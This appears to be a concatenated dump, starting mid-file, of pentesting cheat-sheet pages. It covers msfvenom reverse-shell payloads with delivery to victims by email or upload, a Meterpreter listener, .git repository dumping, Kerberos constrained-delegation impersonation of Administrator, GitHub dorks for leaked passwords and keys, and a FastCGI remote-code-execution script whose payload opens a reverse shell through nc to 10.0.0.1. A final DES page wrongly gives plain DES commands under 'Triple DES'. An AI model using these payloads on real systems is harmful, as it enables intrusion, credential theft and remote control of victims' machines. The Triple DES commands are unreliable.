LPORT=4444 -f exe -o shell.exe 17 | 18 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f aspx -o shell.aspx 19 | ``` 20 | 21 | ### 2. Start Listener using MsfConsole 22 | 23 | ```bash 24 | msfconsole 25 | msf> use exploit/multi/handler 26 | 27 | # Linux 28 | msf> set payload linux/x86/meterpreter/reverse_tcp 29 | # Windows 30 | msf> set payload windows/meterpreter/reverse_tcp 31 | # or 32 | msf> set payload windows/x64/meterpreter/reverse_tcp 33 | 34 | msf> set lhost 10.0.0.1 35 | msf> set lport 4444 36 | msf> run 37 | meterpreter> shell 38 | ``` 39 | 40 | ### 3. Send the Generated File to Target Machine 41 | 42 | After that, we need to send the generated malicious file to target machine somehow such as below: 43 | 44 | - Send email with this file. 45 | - Upload this file to target web server. 46 | 47 | Then a user in target machine executes this file, we may be able to get a shell of target system. -------------------------------------------------------------------------------- /docs/exploit/web/dump-git-repository-from-website.md: -------------------------------------------------------------------------------- 1 | # Dump Git Repository from Website 2 | 3 | If we can have permission to access git repositoy in target website, we can dump the git repository and investigate git logs or histories to get sensitive information. 4 | 5 | ## Dumping 6 | 7 | ### Method 1. Git-Dumper 8 | 9 | [git-dumper](https://github.com/arthaud/git-dumper) is an useful Python package. 10 | 11 | ```bash 12 | pipx install git-dumper 13 | git-dumper https://example.com/.git ./dumped 14 | ``` 15 | 16 | ### Method 2. GitTools 17 | 18 | [GitTools](https://github.com/internetwache/GitTools) downloads Git repository of the web application. 19 | To dump the repository, execute the following commands. 20 | 21 | ```bash 22 | wget https://raw.githubusercontent.com/internetwache/GitTools/master/Dumper/gitdumper.sh 23 | chmod +x gitdumper.sh 24 | ./gitdumper.sh https://example.com/.git/ ./example 25 | ``` 26 | 27 | We should get the git repository in local. 28 | Then extract the entire project by executing the following. 29 | 30 | ```bash 31 | wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh 32 | chmod +x extractor.sh 33 | ./extractor.sh ./example ./new_example 34 | ``` 35 | 36 | Now we retrieve the entire git project from website. 37 | It is stored in **“./new_example”** folder. We can investigate the repository. 38 | 39 | ## After Dumping… 40 | 41 | If we succeed in dumping, we can investigate the repository with `git` command and get sensitive information. See [Git GitHub Pentesting](https://exploit-notes.hdks.org/exploit/version-control/git/git-github-pentesting/). -------------------------------------------------------------------------------- /docs/exploit/game/webassembly-games-hacking.md: -------------------------------------------------------------------------------- 1 | # WebAssembly Games Hacking 2 | 3 | ## Tools 4 | 5 | - **[Cetus](https://github.com/Qwokka/Cetus/)** 6 | 7 | A browser extension for hacking WebAssembly games. To use it, open developer tool in Chrome or Firefox, and select Cetus tab. 8 | 9 | ## Guess the Random Number 10 | 11 | 1. First off, try manually input the guessing number. Maybe you will fault then copy the result. 12 | 2. Open developer tool and Cetus, in Search panel, paste the number in the Value form. 13 | 3. Select “EQ (equal)”, and Value Type, Only Aligned Address?("yes"). 14 | 4. Click “Search” button. 15 | 5. If you will not get the result, try again. 16 | 6. If you will get the result, click the bookmark icon on the right of the result. 17 | 7. Move to the Bookmarks panel. 18 | 8. You need to try the guessing, then you should know the value of the bookmark will change. 19 | 9. Convert the hex value to decimal number and input it. 20 | 21 | ## Manipulate Character’s Health 22 | 23 | Reference: [https://github.com/Qwokka/Cetus/wiki/Cetus-101---Invincibility](https://github.com/Qwokka/Cetus/wiki/Cetus-101---Invincibility) 24 | 25 | 1. Open Search panel, empty value in the Value and click Search (or Restart Search) button. 26 | 2. Take damage on purpose. 27 | 3. In Search panel of the Cetus, select “LT” operator and search again. 28 | 4. It will show the results. 29 | 5. One of the results is most likely the Health you just lost, so bookmark it. 30 | 6. Move to the Bookmarks panel, check the “Freeze” on the address you’ve bookmarked now. 31 | 7. You've frozen your HP now, so taking damage shouldn't reduce your HP. -------------------------------------------------------------------------------- /docs/exploit/windows/active-directory/constrained-delegation-attack.md: -------------------------------------------------------------------------------- 1 | # Constrained Delegation Attack 2 | 3 | If a compromised account has the Kerberos Constrained Delegation right, the account may impersonate another user to request Kerberos service ticket and use it for such as signin services. 4 | 5 | ## Investigation 6 | 7 | ### Check if Kerberos Constrained Delegation Enabled for User 8 | 9 | Reference: [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation#prerequisites](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation#prerequisites) 10 | 11 | ```sh 12 | Get-NetUser -TrustedToAuth 13 | ``` 14 | 15 | ## Exploit 16 | 17 | ### 1. Request Service Ticket for Another User 18 | 19 | The target SPN needs to be allowed for delegation. 20 | 21 | ```bash 22 | # -k: Use Kerberos Auth 23 | impacket-getST -k -impersonate Administrator -spn cifs/dc.example.local example.local/UserName 24 | ``` 25 | 26 | ### 2. Use the Service Ticket 27 | 28 | After getting the service ticket, we can use it for further pentesting. 29 | We need to add the environment variable as below: 30 | 31 | ```bash 32 | export KRB5CCNAME=`pwd`/Administrator.ccache 33 | 34 | # Check by listing tickets. 35 | # If the klist command not found, install it by `apt install krb5-user` 36 | klist 37 | ``` 38 | 39 | - Login to Services with Kerberos Auth 40 | 41 | ```bash 42 | # -k: Use Kerberos Auth 43 | # -no-pass: No password 44 | impacket-wmiexec example.local/Administrator@example.local -k -no-pass 45 | ``` -------------------------------------------------------------------------------- /docs/exploit/reconnaissance/osint/github-dorks.md: -------------------------------------------------------------------------------- 1 | # GitHub Dorks 2 | 3 | ## Common Credentials 4 | 5 | ```sh 6 | path:.env 7 | path:.env passwd 8 | path:.env password 9 | path:.env secret 10 | 11 | path:*.env api 12 | path:*.env passwd 13 | path:*.env password 14 | path:*.env secret 15 | 16 | path:config.* auth 17 | path:config.* password 18 | path:config.* passwd 19 | path:config.* token 20 | path:config.json password 21 | 22 | "example.com" password 23 | "example.com" passwd 24 | "example.com" credential 25 | "example.com" creds 26 | ``` 27 | 28 | ## Web Conf 29 | 30 | ```sh 31 | path:.htpasswd 32 | ``` 33 | 34 | ## WordPress 35 | 36 | ```sh 37 | path:wp-config.php 38 | ``` 39 | 40 | ## Databases 41 | 42 | ```sh 43 | path:*.db 44 | path:*.sqlite3 45 | path:.pgpass 46 | path:my.cnf 47 | path:redis.conf 48 | path:mongod.conf 49 | ``` 50 | 51 | ## Git 52 | 53 | ```sh 54 | path:.git-credentials 55 | ``` 56 | 57 | ## Bash 58 | 59 | ```sh 60 | path:.bash_history 61 | path:.bash_profile 62 | path:.bashrc 63 | path:.profile 64 | 65 | path:.bashrc password 66 | path:.bash_history root 67 | 68 | path:etc/passwd 69 | path:etc/shadow 70 | 71 | path:password.* 72 | ``` 73 | 74 | ## SSH 75 | 76 | ```sh 77 | path:id_rsa 78 | path:private_key 79 | path:.ssh/id_rsa 80 | ``` 81 | 82 | ## Docker 83 | 84 | ```sh 85 | path:docker.conf 86 | path:docker.service 87 | ``` 88 | 89 | ## Backup Files 90 | 91 | ```sh 92 | path:*.bak 93 | path:*.old 94 | path:backup 95 | path:backups 96 | ``` 97 | 98 | ## References 99 | 100 | - [GitHub Dorks](https://github.com/techgaun/github-dorks) -------------------------------------------------------------------------------- /docs/exploit/network/fastcgi.md: -------------------------------------------------------------------------------- 1 | # FastCGI Pentesting 2 | 3 | FastCGI is a binary protocol for interfacing interactive programs with a web server. It uses 9000 port by default. 4 | 5 | ## Investigation 6 | 7 | If the **PHP-FPM (FastCGI Process Manager)** is running on the target system, we might be able to execute arbitrary command. 8 | 9 | ```bash 10 | ps aux | cat 11 | 12 | php-fpm: pool username 13 | ``` 14 | 15 | ## Remote Code Execution 16 | 17 | Reference: [https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi](https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi) 18 | 19 | We need to create an arbitrary PHP file somewhere. For instance, 20 | 21 | ```bash 22 | touch /dev/shm/index.php 23 | ``` 24 | 25 | Then create a shell script named **"exploit.sh"**. 26 | 27 | ```bash 28 | #!/bin/bash 29 | 30 | PAYLOAD="&1|nc 10.0.0.1 4444 >/tmp/f'); echo '-->';" 31 | FILENAMES="/dev/shm/index.php" # Exisiting file path 32 | 33 | HOST=$1 34 | B64=$(echo "$PAYLOAD"|base64) 35 | 36 | for FN in $FILENAMES; do 37 | OUTPUT=$(mktemp) 38 | env -i \ 39 | PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \ 40 | SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \ 41 | cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT 42 | 43 | cat $OUTPUT 44 | done 45 | ``` 46 | 47 | Now execute the shell script. Of course we have to start a listener in local machine for reverse shell before executing the following command. 48 | 49 | ```bash 50 | chmod +x exploit.sh 51 | ./exploit.sh 52 | ``` -------------------------------------------------------------------------------- /docs/exploit/cryptography/algorithm/des.md: -------------------------------------------------------------------------------- 1 | # DES (Data Encryption Standard) 2 | 3 | The DES is a symmetric-key algorithm for the encryption of digital data. 4 | 5 | ## Basic Encryption/Decription with OpenSSL 6 | 7 | ### 1. Prepare Plain Text File 8 | 9 | At first, we create a text file which contains a simple word "hello". 10 | 11 | ```sh 12 | echo hello > hello.txt 13 | ``` 14 | 15 | ### 2. Encrypt the Plain Text File 16 | 17 | Using `openssl`, we can encrypt the file using **DES** algorithm. We're asked the password so enter the new one. 18 | 19 | ```sh 20 | openssl des -e -in hello.txt -out encrypted.enc 21 | ``` 22 | 23 | After encryption, we can send the encrypted file to someone else. And someone can decrypt it with the DES algorithm. 24 | 25 | ### 3. Decrypt the Encrypted File 26 | 27 | In the decryption process, we can also use the almost same command but specify `-d (decrypt)` option instead of `-e (encrypt)`. We'll be asked the password which is set when encryption so enter the same password. 28 | 29 | ```sh 30 | openssl des -d -in encrypted.enc -out decrypted.txt 31 | ``` 32 | 33 | After decryption, confirm that the content of the `decrypted.txt` is the same as that of the original plain `hello.txt`. 34 | 35 | ```sh 36 | cat decrypted.txt 37 | # hello 38 | ``` 39 | 40 | ## Triple DES 41 | 42 | **Triple DES (3DES)** applies the **DES** cipher algorithm three times to each data block. 43 | This encryption/description process with `openssl` is almost the same as that of **DES** so I'll write it briefly here 44 | 45 | ```sh 46 | # Encryption 47 | openssl des -e -in hello.txt -out encrypted.enc 48 | 49 | # Decryption 50 | openssl des -d -in encrypted.enc -out decrypted.txt 51 | ``` 52 | --------------------------------------------------------------------------------